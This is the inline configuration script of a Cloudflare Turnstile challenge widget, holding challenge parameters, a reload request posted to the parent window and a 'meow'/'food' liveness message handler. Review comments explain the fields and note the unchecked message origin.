(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'ynr3d',
chlApiSitekey: '0x4AAAAAAA0L_ooW9uraju6I',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: '1/kVL2t161R37ZZrj_',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8ebbddc13bee1865',
cH: 'tT9bkmA4CvF0Y.XtSfM4ngyjTpxVP1DXZzN9KOYk4WY-1733148267-1.1.1.1-q3GgQnjA5eJCWenrUaTvv1AT6kGbIfNoMa0q6GUlos29MUZYyYXcuxQjyPn3Lqqd',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
// Opaque per-challenge blob; it embeds the same value as cITimeS below.
md: 'uyBftO0Ko04hErU0HeVxWAItEiItK57V0K4fw_Jc3Uk-1733148267-1.1.1.1-p.pbxQ9vtCr9ho934p5cd0D9.VFZVy59V_kXDc6dMo0zewMA_j2Q8vtSgKwXDaFjLFw8AqZz1fSXUithAep3wNqB0.hDEH6IQIZ3Flfke16b0cynd.pNYOre0QGLDxpD0cU4pEh7xFc9I_RIkLx71dekeZlJhmmtGqBdB8eRNimNOJFqzyt_yuAS1PB8hWr._n5Wt31WddHWxZ1C9MluVhkOmqD23Y4l2Za51.L8AwBFFjGn1FvKWhT9yVRcvJr.d7a2ogv1klrWjhsL6_HoCGoPMhNH3hUg6bCHV7KJt9M35QG7WjqoDbVEgcwaxRJTI.tEpBXOmtczcmTswniOOXEh_4Q7HGCW7RdX8HdWzCAwX7YIHngFR9gf8CiMQQrtYPW1CNS2DBFopcilVa50Ri5BEoJWOmx_a0S94O9Zkbo.zwTp.Tl9EMub6E2ahN04Q956x6DAjU_3qiDUWmhzyt9nuTRLagElsfhuCuTgAC5jZKrLyYaxW99FIsgpaXRsNo5k92qjUuMNfsyAns7jXkTFc1wE3tI1JU0mp8SbFx2ggisxpwviHSKjtkN2YH0Wzt2ZswlQAqzLCkVScEEklnObTKW1yakyzGueFOpMTP_nL.jMmkqeRk7cs71BBuFdabfVmi4X.b5BEXZ8UrGfMTxOOhG5rP6_bqzg89C5QUHOHBDYR6ZdE6CEhfzol0c4qBv6pEHsHCFmQynvstYSbfBpEQTMUW5OG09skrkqOOPSvjvhS3.rrCjbVNeCfpQaaLyoMeQMEn3ce44OXNEwh0UVMUmmdJpp1sEZR7Xa7QKptQyaPfFjAdz1u2d0sRJo4nBAb8P8z2CBQhNEV_FS4mklRCU1DlDK9HuTopswVEmVn1un79iuMGANIun2il3rwk667Qw3i1NvMYT3_0V1IyAiMo1RDJtf0lFgt_m9P0jI.VjUpPqIq8b7R1zQ16ZZ9QI5aTw5kxhhlKAG1wdAsn2J1d_WtJmDOP7epYYv2CHoOitmQl.BNNBfI..iMyYSsL8Rx2f97Oj6PWoI2RdwBpb8g7c0JCKFIITvAFkNSaWUqrypL_ULUGWVotiX1VHlf8.OsgcXOrGNNgFiOXwTrvp9PKr1FQ2gDIqt09LbDqyiyl6uWwIX75jUMQS_MXnKEVlvQQ6GFbiBSXcPsUxJPm._oP2Osx6BPNXAkU0Cqr8IBl21WRKF92N6E4JJfacvy96ba4ExsAP_0qR_C3T1.XuzKP3kkh0S8ZIYr206b0UTnA6M2zQpeBtznE9OO5khX8k7wXfodlWFvUvmZNgIO5c6vxoLmDVSeINhYVmPXLNpuj795b69zJd_SW_2g_SrlFx.D5dW5h.e1p2w7KtOhqya4nPp.ThDyZUPxxuOz5s',
// NOTE(review): looks like a Unix timestamp in seconds (challenge issue time) - confirm.
cITimeS: '1733148267',
// Asks the embedding page to reload the widget. targetOrigin "*" means any
// parent receives the message; the payload shown here carries only the widget
// id, the nextRcV value and an event name.
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'ynr3d',
nextRcV: '1/kVL2t161R37ZZrj_',
event: 'reloadRequest',
}, "*");
}
}
};
// Liveness exchange: an incoming 'meow' message for this widget is answered with
// 'food', echoing the sender's seq. The filter inspects fields of event.data
// only (e.source here is a data field); event.origin is not checked, so any
// window able to post to this frame can elicit the reply.
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|